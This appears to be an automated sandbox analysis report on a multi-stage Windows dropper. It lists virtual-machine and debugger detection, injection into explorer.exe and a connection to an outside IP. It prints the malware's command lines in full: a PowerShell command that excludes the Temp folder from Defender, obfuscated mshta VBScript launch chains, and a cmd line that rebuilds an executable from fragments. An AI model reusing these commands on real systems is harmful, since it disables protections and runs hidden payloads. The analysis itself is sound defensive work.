                  Source: explorer.exe, 0000002F.00000003.3105498563.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Amcache.hve.30.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.30.drBinary or memory string: vmci.sys
                  Source: control.exe, 00000038.00000002.1954525048.0000000002C34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\sa`
                  Source: Mon178817e243.exe.1.drBinary or memory string: vmware
                  Source: explorer.exe, 0000002F.00000003.3105498563.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ-
                  Source: explorer.exe, 0000002F.00000000.1908199562.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                  Source: Amcache.hve.30.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.30.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.30.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.30.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.30.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000000.1712015899.0000000000E62000.00000002.00000001.01000000.0000000F.sdmp, Mon178817e243.exe.1.drBinary or memory string: <Module>pctool.exeProgramStubRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorMainDownloadPayloadRunOnStartup.ctorExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatorurlregNameAppPathHidepathlpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributepctoolEnvironmentExitSystem.ThreadingThreadSleepSystem.IOPathGetTempPathCombineFileWriteAllBytesSystem.NetServicePointManagerSecurityProtocolTypeset_SecurityProtocolWebRequestCreateHttpWebRequestset_MethodWebResponseGetResponseHttpWebResponseStreamGetResponseStreamMemoryStreamCopyToCloseDisposeToArrayIDisposableAppDomainget_CurrentDomainget_FriendlyNameStringConcatExistsAssemblyGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineOpenSubKeySetValueCurrentUserException.cctorSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_Currentget_ItemToStringToLowerop_EqualityToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticks
                  Source: Amcache.hve.30.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.30.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.30.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.30.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.30.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: explorer.exe, 0000002F.00000002.4164547878.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                  Source: explorer.exe, 0000002F.00000000.1908199562.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4150744585.00000000009FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&&
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1831570422.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
                  Source: explorer.exe, 0000002F.00000002.4147635589.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Amcache.hve.30.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: explorer.exe, 0000002F.00000002.4178462756.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Amcache.hve.30.drBinary or memory string: VMware Virtual USB Mouse
                  Source: explorer.exe, 0000002F.00000002.4147635589.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                  Source: Amcache.hve.30.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.30.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.30.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.30.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.30.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.30.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000000.1712015899.0000000000E62000.00000002.00000001.01000000.0000000F.sdmp, Mon178817e243.exe.1.drBinary or memory string: DetectVirtualMachine
                  Source: Amcache.hve.30.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.30.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: setup_install.exe, 00000002.00000002.1969282898.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4148367309.0000000001439000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: explorer.exe, 0000002F.00000000.1908199562.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                  Source: explorer.exe, 0000002F.00000000.1908199562.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                  Source: explorer.exe, 0000002F.00000002.4178462756.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: Amcache.hve.30.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.30.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.30.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.30.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.30.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: explorer.exe, 0000002F.00000002.4147635589.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeAPI call chain: ExitProcess graph end nodegraph_0-3541
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeSystem information queried: ModuleInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeSystem information queried: CodeIntegrityInformation
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_00855427 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00855427
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004014E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004014E0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_00855A91 mov eax, dword ptr fs:[00000030h]18_2_00855A91
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_008588D7 GetProcessHeap,18_2_008588D7
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0040115C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,2_2_0040115C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0040CB0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,2_2_0040CB0C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0040CB10 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,2_2_0040CB10
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00401150 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,2_2_00401150
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,2_2_004013C9
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_649486F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,2_2_649486F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_649486EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,2_2_649486EC
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_00855427 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00855427
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_00852D4A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00852D4A
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_0085295C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0085295C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_00852EA9 SetUnhandledExceptionFilter,18_2_00852EA9
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F673B10 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF72F673B10
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6A2354 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF72F6A2354
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\explorer.exeFile created: bgjifes.47.drJump to dropped file
                  Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeThread created: C:\Windows\explorer.exe EIP: 3441950
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMemory written: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeMemory written: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_00403C0B GetTempPathW,GetUserDefaultUILanguage,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,ShowWindow,GetClassInfoW,GetClassInfoW,GetClassInfoW,RegisterClassW,DialogBoxParamW,0_2_00403C0B
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess created: C:\Users\user\AppData\Local\Temp\setup_installer.exe "C:\Users\user\AppData\Local\Temp\setup_installer.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17742f90b916675f2.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17eac6d534bfd22c7.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17c604381c7047e.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17e1fac3fd3d84b.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17b5f403be4d8d6b.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17f45359eb9.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1785436ae78.exe /mixoneJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17948100733a95c58.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon179e1058f256.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1795d04d4bd.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon178817e243.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe Mon17742f90b916675f2.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe Mon17eac6d534bfd22c7.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe Mon17c604381c7047e.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe Mon17e1fac3fd3d84b.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe Mon17b5f403be4d8d6b.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe Mon17f45359eb9.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Mon1785436ae78.exe /mixoneJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe Mon17948100733a95c58.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe Mon179e1058f256.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe Mon1795d04d4bd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe Mon178817e243.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\09xU.exE 9xU.EXE -pPtzyIkqLZoCarb5ew
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F -Im "Mon17e1fac3fd3d84b.exe"
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\control.exe control .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F -Im "Mon17e1fac3fd3d84b.exe"
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exeProcess created: C:\Windows\SysWOW64\mshta.exe "c:\windows\system32\mshta.exe" vbscript: close (createobject ( "wscript.shell" ).run ( "cmd.exe /c copy /y ""c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe"" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if """" =="""" for %u in ( ""c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe"" ) do taskkill /f -im ""%~nxu"" " , 0 , true) )
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c copy /y "c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe" 09xu.exe && start 09xu.exe -pptzyikqlzocarb5ew & if "" =="" for %u in ( "c:\users\user\appdata\local\temp\7zs8bd79f65\mon17e1fac3fd3d84b.exe" ) do taskkill /f -im "%~nxu"
